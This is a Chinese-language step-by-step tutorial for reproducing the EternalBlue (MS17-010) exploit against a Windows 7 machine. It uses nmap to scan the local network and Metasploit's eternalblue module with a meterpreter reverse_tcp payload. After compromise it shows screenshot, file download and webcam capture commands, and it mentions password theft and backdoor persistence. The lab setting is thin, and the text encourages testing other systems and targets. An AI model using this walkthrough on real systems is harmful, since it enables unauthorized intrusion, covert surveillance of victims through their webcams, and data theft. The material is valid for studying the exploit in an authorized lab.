如題,這是個漏洞復現的詳細教程,本教程針對的系統是Windows7操作系統,其他系統請自行測試。
備注:教程會很詳細,講解會很明白,一文可以解決你的常見困難。
測試環境
kalilinux 192.168.1.109 (主機)
windows7 192.168.1.104 (虛擬機)
開始
首先使用 nmap 命令掃描局域網內的所有主機(因為ms17_010漏洞的最基本要求是需要開啟445端口),這里使用nmap的最基本的掃描,直接命令后跟ip,nmap 192.168.1.1/24(掃描整個局域網的意思)。
首先開啟Metasploit框架,這是一款集合各種漏洞和后期利用工具的框架,強大到不需要太多專業知識就可以快速上手的攻擊框架,配合圖形化界面Armitage可以實現圖形化界面攻擊。
msfconsole //啟動命令
然后開啟另一個窗口,看一下自己的ip,掃描自己的所在的ip段,可以看到我的ip是192.168.1.109。,那么我的ip段就是192.168.1.1/24(掃描1-255主機)。
ifconfig 查看自己電腦ip
使用nmap掃描局域網所有主機的開放端口
nmap 192.168.1.1/24 //掃描主機的端口開放情況
這里顯示了目標電腦的ip和端口服務等信息,可以看到這個電腦的445端口是開放的,所以就直接進行攻擊。
回到剛才的窗口,搜索ms17_010漏洞,可以看到返回了四條數據,我們這里使用的是第三條進行攻擊,可以先使用第二條測試下目標電腦是否包含該漏洞,若是有的話進行攻擊,沒有的話可以考慮別的目標。
search ms17_010
使用永恆之藍漏洞,使用use 名稱 命令進行命令使用。
use exploit/windows/smb/ms17_010_eternalblue //使用永恆之藍漏洞
然后顯示所需要的參數.
show options
我們需要設置一個遠程主機ip和一個自己電腦ip,外加一個攻擊載體,就可以進行攻擊了(依次執行下邊命令)。
set rhost 192.168.1.104 //設置目標主機
set payload windows/x64/meterpreter/reverse_tcp //設置攻擊載體(簡單來說就是,如果不使用這個模塊,攻擊成功之后,就是一個簡單的shell,使用這個載體,攻擊成功之后可以使用這個模塊自帶的各種攻擊模塊(強大到想流淚的功能模塊))。
set lhost 192.168.1.109 //設置本機ip地址(用來攻擊成功之后,監聽被開放的目標電腦的端口)
run //執行攻擊
設置完成之后可以查看下設置的參數,以確保參數正確(這個步驟可以省略)。
show options
run //執行漏洞
利用成功,成功之后會出現下面的情況,在這里可以進行文件上傳下載,獲取截屏,獲取密碼,使用攝像頭拍照,后門持久化等操作。
截屏操作,截取的圖片可以去制定的目錄里面查看
screenshot
獲取截屏。
下載文件
download AHK.ahk
使用攝像頭拍照
webcam_snap //使用攝像頭拍一張照片
webcam_stream //在網頁開啟攝像頭